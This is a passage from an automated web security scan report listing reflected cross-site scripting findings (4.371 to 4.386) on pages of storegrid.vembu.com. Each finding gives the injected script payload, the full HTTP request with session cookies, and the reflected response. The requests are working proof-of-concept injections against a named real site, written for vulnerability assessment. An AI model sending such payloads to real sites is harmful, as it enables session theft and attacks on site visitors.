...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/ms-exchange-backup.php?ct=167781"><script>alert(1)</script>4158fd060b2" name="next-url" type="hidden">
...[SNIP]...

4.371. http://storegrid.vembu.com/online-backup/ms-exchange-backup.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/ms-exchange-backup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe062"><script>alert(1)</script>25da07f3345 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/ms-exchange-backup.php?fe062"><script>alert(1)</script>25da07f3345=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:12:46 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 26158

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>MS Exchange Backup | Vembu StoreGrid | Mailbox Backup Software for MSPs, VAR
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/ms-exchange-backup.php?fe062"><script>alert(1)</script>25da07f3345=1" name="next-url" type="hidden">
...[SNIP]...

4.372. http://storegrid.vembu.com/online-backup/mssql-backup.php [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/mssql-backup.php

Issue detail

The value of the ct request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd558"><script>alert(1)</script>841d3aa4621 was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/mssql-backup.php?ct=1dd558"><script>alert(1)</script>841d3aa4621 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:14:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 24938

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>MS SQL Backup | Vembu StoreGrid | SQL Database Backup software for MSPs, VAR
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/mssql-backup.php?ct=1dd558"><script>alert(1)</script>841d3aa4621" name="next-url" type="hidden">
...[SNIP]...

4.373. http://storegrid.vembu.com/online-backup/mssql-backup.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/mssql-backup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23701"><script>alert(1)</script>a4aec06ff86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/mssql-backup.php?ct=1&23701"><script>alert(1)</script>a4aec06ff86=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:14:19 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 24941

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>MS SQL Backup | Vembu StoreGrid | SQL Database Backup software for MSPs, VAR
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/mssql-backup.php?ct=1&23701"><script>alert(1)</script>a4aec06ff86=1" name="next-url" type="hidden">
...[SNIP]...

4.374. http://storegrid.vembu.com/online-backup/mysql-backup.php [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/mysql-backup.php

Issue detail

The value of the ct request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3af5b"><script>alert(1)</script>535814d6f4a was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/mysql-backup.php?ct=13af5b"><script>alert(1)</script>535814d6f4a HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:14:19 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 18892

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>MySQL Backup | Vembu StoreGrid | MySQL Database Backup software for MSPs, VA
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/mysql-backup.php?ct=13af5b"><script>alert(1)</script>535814d6f4a" name="next-url" type="hidden">
...[SNIP]...

4.375. http://storegrid.vembu.com/online-backup/mysql-backup.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/mysql-backup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bc2b"><script>alert(1)</script>9a4f044c966 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/mysql-backup.php?ct=1&2bc2b"><script>alert(1)</script>9a4f044c966=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:14:28 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 25207

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>MySQL Backup | Vembu StoreGrid | MySQL Database Backup software for MSPs, VA
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/mysql-backup.php?ct=1&2bc2b"><script>alert(1)</script>9a4f044c966=1" name="next-url" type="hidden">
...[SNIP]...

4.376. http://storegrid.vembu.com/online-backup/network-backup.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/network-backup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cde12"><script>alert(1)</script>0cf69fce5f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/network-backup.php?cde12"><script>alert(1)</script>0cf69fce5f2=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; __utmb=230392542.2.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 06:41:05 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 24455

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Onsite Backup Software for Network based Disk to Disk Backup for SMBs and RO
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/network-backup.php?cde12"><script>alert(1)</script>0cf69fce5f2=1" name="next-url" type="hidden">
...[SNIP]...

4.377. http://storegrid.vembu.com/online-backup/outlook-backup.php [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/outlook-backup.php

Issue detail

The value of the ct request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22be0"><script>alert(1)</script>fff1263a81c was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/outlook-backup.php?ct=222be0"><script>alert(1)</script>fff1263a81c HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; __utmb=230392542.2.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 06:42:52 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 17472

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>MS Outlook, Windows Mail & Outlook Express | Email Backup software for MSPs,
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/outlook-backup.php?ct=222be0"><script>alert(1)</script>fff1263a81c" name="next-url" type="hidden">
...[SNIP]...

4.378. http://storegrid.vembu.com/online-backup/outlook-backup.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/outlook-backup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4686"><script>alert(1)</script>3bbd7b3a921 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/outlook-backup.php?ct=2&b4686"><script>alert(1)</script>3bbd7b3a921=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; __utmb=230392542.2.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 06:43:02 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 22935

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>MS Outlook, Windows Mail & Outlook Express | Email Backup software for MSPs,
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/outlook-backup.php?ct=2&b4686"><script>alert(1)</script>3bbd7b3a921=1" name="next-url" type="hidden">
...[SNIP]...

4.379. http://storegrid.vembu.com/online-backup/partner-zone.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/partner-zone.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38499"><script>alert(1)</script>b51163c540f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/partner-zone.php?38499"><script>alert(1)</script>b51163c540f=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; __utmb=230392542.2.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 06:39:57 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 25148

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Vembu StoreGrid's Partner Zone - a Powerful Portal that helps you in mana
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/partner-zone.php?38499"><script>alert(1)</script>b51163c540f=1" name="next-url" type="hidden">
...[SNIP]...

4.380. http://storegrid.vembu.com/online-backup/refer-partner.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/refer-partner.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da35f"><script>alert(1)</script>bf4cd89d9d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/refer-partner.php?da35f"><script>alert(1)</script>bf4cd89d9d3=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; __utmb=230392542.2.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 06:42:15 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 27305

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Refer a Partner for a Referral Fee</title>
<meta http-equiv="Content-Type" c
...[SNIP]...
<input type="hidden" name="from-url" value="http://storegrid.vembu.com/online-backup/refer-partner.php?da35f"><script>alert(1)</script>bf4cd89d9d3=1">
...[SNIP]...

4.381. http://storegrid.vembu.com/online-backup/rsync-incremental-backup.php [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/rsync-incremental-backup.php

Issue detail

The value of the ct request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84c06"><script>alert(1)</script>28f629582fd was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/rsync-incremental-backup.php?ct=284c06"><script>alert(1)</script>28f629582fd HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:12:08 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 18305

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Byte-level Incremental Backup | Vembu StoreGrid | Online Backup software for
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/rsync-incremental-backup.php?ct=284c06"><script>alert(1)</script>28f629582fd" name="next-url" type="hidden">
...[SNIP]...

4.382. http://storegrid.vembu.com/online-backup/rsync-incremental-backup.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/rsync-incremental-backup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f71a5"><script>alert(1)</script>5b304f00926 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/rsync-incremental-backup.php?f71a5"><script>alert(1)</script>5b304f00926=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:12:08 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 24615

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Byte-level Incremental Backup | Vembu StoreGrid | Online Backup software for
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/rsync-incremental-backup.php?f71a5"><script>alert(1)</script>5b304f00926=1" name="next-url" type="hidden">
...[SNIP]...

4.383. http://storegrid.vembu.com/online-backup/security.php [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/security.php

Issue detail

The value of the ct request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28578"><script>alert(1)</script>08073fbd3ac was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/security.php?ct=128578"><script>alert(1)</script>08073fbd3ac HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:11:01 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 17658

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Security and Encryption | Reliable Backup Software for MSPs, VARs, Service P
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/security.php?ct=128578"><script>alert(1)</script>08073fbd3ac" name="next-url" type="hidden">
...[SNIP]...

4.384. http://storegrid.vembu.com/online-backup/security.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/security.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e769b"><script>alert(1)</script>31c076207e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/security.php?ct=1&e769b"><script>alert(1)</script>31c076207e3=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:11:01 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 23952

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Security and Encryption | Reliable Backup Software for MSPs, VARs, Service P
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/security.php?ct=1&e769b"><script>alert(1)</script>31c076207e3=1" name="next-url" type="hidden">
...[SNIP]...

4.385. http://storegrid.vembu.com/online-backup/sharepoint-backup.php [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/sharepoint-backup.php

Issue detail

The value of the ct request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd826"><script>alert(1)</script>1abf4ccbb6f was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/sharepoint-backup.php?ct=1bd826"><script>alert(1)</script>1abf4ccbb6f HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:10:13 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 25246

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Microsoft Sharepoint Server Backups - Vembu StoreGrid Backup Software</title
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/sharepoint-backup.php?ct=1bd826"><script>alert(1)</script>1abf4ccbb6f" name="next-url" type="hidden">
...[SNIP]...

4.386. http://storegrid.vembu.com/online-backup/sharepoint-backup.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/sharepoint-backup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1a0c"><script>alert(1)</script>83e240a15b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/sharepoint-backup.php?a1a0c"><script>alert(1)</script>83e240a15b4=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
